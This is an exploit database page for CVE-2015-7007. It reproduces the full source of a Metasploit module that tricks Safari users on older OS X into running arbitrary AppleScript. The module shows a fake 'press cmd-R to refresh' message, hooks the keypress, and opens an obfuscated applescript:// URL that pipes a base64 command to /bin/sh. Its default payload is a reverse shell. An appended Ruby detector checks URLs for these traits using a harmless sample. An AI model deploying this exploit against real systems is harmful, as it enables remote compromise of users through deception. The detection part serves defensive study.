
Apple Safari - User-Assisted Applescript Exec Attack (Metasploit)

Published: 26 Oct 2015 00:00:00
Reported by: Metasploit
Type: exploitdb
Source: www.exploit-db.com

Apple Safari User-Assisted Applescript Exec Attack before OS X 10.11.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Safari User-Assisted Applescript Exec Attack Exploit | 26 Oct 2015 00:00 | zdt |
| Tenable Nessus | Mac OS X 10.9.5 or later < 10.11.1 Multiple Vulnerabilities | 27 May 2016 00:00 | nessus |
| Tenable Nessus | Mac OS X < 10.11.1 Multiple Vulnerabilities | 29 Oct 2015 00:00 | nessus |
| Circl | CVE-2015-7007 | 26 Oct 2015 00:00 | circl |
| CNVD | Apple OS X Script Editor Restriction Bypass Vulnerability | 30 Oct 2015 00:00 | cnvd |
| CVE | CVE-2015-7007 | 23 Oct 2015 21:00 | cve |
| Cvelist | CVE-2015-7007 | 23 Oct 2015 21:00 | cvelist |
| Metasploit | Safari User-Assisted Applescript Exec Attack | 22 Oct 2015 14:46 | metasploit |
| NVD | CVE-2015-7007 | 23 Oct 2015 21:59 | nvd |
| OpenVAS | Apple Mac OS X Multiple Vulnerabilities-01 (Oct 2015) | 29 Oct 2015 00:00 | openvas |

Code

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Safari User-Assisted Applescript Exec Attack',
      'Description'    => %q{
        In versions of Mac OS X before 10.11.1, the applescript:// URL
        scheme is provided, which opens the provided script in the Applescript
        Editor. Pressing cmd-R in the Editor executes the code without any
        additional confirmation from the user. By getting the user to press
        cmd-R in Safari, and by hooking the cmd-key keypress event, a user
        can be tricked into running arbitrary Applescript code.

        Gatekeeper should be disabled from Security & Privacy in order to
        avoid the unidentified Developer prompt.
      },
      'License'         => MSF_LICENSE,
      'Arch'            => ARCH_CMD,
      'Platform'        => ['unix', 'osx'],
      'Compat'          =>
        {
          'PayloadType' => 'cmd'
        },
      'Targets'         =>
        [
          [ 'Mac OS X', {} ]
        ],
      'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },
      'DefaultTarget'   => 0,
      'DisclosureDate'  => 'Oct 16 2015',
      'Author'          => [ 'joev' ],
      'References'     =>
        [
          [ 'CVE', '2015-7007' ],
          [ 'URL', 'https://support.apple.com/en-us/HT205375' ]
        ],
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::SAFARI,
        :os_name => OperatingSystems::Match::MAC_OSX
      }
    ))

    register_options([
      OptString.new('CONTENT', [false, "Content to display in browser",
        "This page has failed to load. Press cmd-R to refresh."]),
      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
    ], self.class)
  end

  def on_request_exploit(cli, request, profile)
    print_status("Sending #{self.name}")
    send_response_html(cli, exploit_html)
  end

  def exploit_html
    "<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>"
  end

  def exploit_js
    js_obfuscate %Q|
      var as = Array(150).join("\\n") +
        'do shell script "echo #{Rex::Text.encode_base64(sh)} \| base64 --decode \| /bin/sh"';
      var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);
      window.onkeydown = function(e) {
        if (e.keyCode == 91) {
          window.location = url;
        }
      };
    |
  end

  def sh
    'killall "Script Editor"; nohup ' + payload.encoded
  end

  def content
    datastore['CONTENT']
  end


end
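
A defensive counterpart to the module above, added here and not part of the Metasploit source: a Ruby check that takes an `applescript://` URL already recovered from a page or from endpoint telemetry and reports the traits the module's URL carries (Script Editor preload, leading newline padding, `do shell script`, base64 piped to a shell). The function name, finding labels and padding threshold are assumptions of this example, and the sample URLs are constructed with a harmless payload.

```ruby
require 'uri'

# Added detection example; names and threshold are assumptions, not Metasploit code.
PAD_THRESHOLD = 20 # leading blank lines treated as suspicious (assumed value)

# Returns nil for non-applescript URLs, otherwise a hash of findings.
def analyze_applescript_url(url)
  scheme, rest = url.to_s.split('://', 2)
  return nil unless scheme.to_s.casecmp?('applescript') && rest

  target, query = rest.split('?', 2)
  params = begin
    URI.decode_www_form(query.to_s).to_h
  rescue ArgumentError
    {} # non-ASCII or malformed query string: treat as no parameters
  end
  script = params['script'].to_s

  findings = []
  # The URL form used on this page: open a new Script Editor document with a script.
  if target.to_s.casecmp?('com.apple.scripteditor') &&
     params['action'] == 'new' && !script.empty?
    findings << :script_editor_preload
  end
  # The module prepends a long run of newlines before the script text.
  pad = script[/\A\s*/].count("\n")
  findings << :leading_newline_padding if pad >= PAD_THRESHOLD
  # AppleScript's bridge to the shell.
  findings << :do_shell_script if script.match?(/\bdo\s+shell\s+script\b/i)
  # Encoded command decoded and handed to a shell interpreter.
  if script.match?(/base64\s+(--decode|-d|-D)\b.*\|\s*\S*sh\b/)
    findings << :base64_piped_to_shell
  end
  { padding_lines: pad, findings: findings }
end

# Constructed samples: the first has the module's URL shape with a harmless
# payload ("echo hi" in base64); the second is an ordinary script link.
PREFIX = 'applescript://com.apple.scripteditor?action=new&script='
SAMPLE_SCRIPT = ("\n" * 149) +
                'do shell script "echo ZWNobyBoaQ== | base64 --decode | /bin/sh"'
SAMPLE_URL = PREFIX + URI.encode_www_form_component(SAMPLE_SCRIPT)
BENIGN_URL = PREFIX + URI.encode_www_form_component('display dialog "hello"')

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_URL, BENIGN_URL].each { |u| puts analyze_applescript_url(u).inspect }
end
```

A preload finding on its own is ordinary use of the URL scheme; the combination of padding, `do shell script` and a decode-to-shell pipeline is what matches the module's output.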


Vulners AI Score: 7.4 (High risk)
CVSS 2: 7.5
EPSS: 0.78161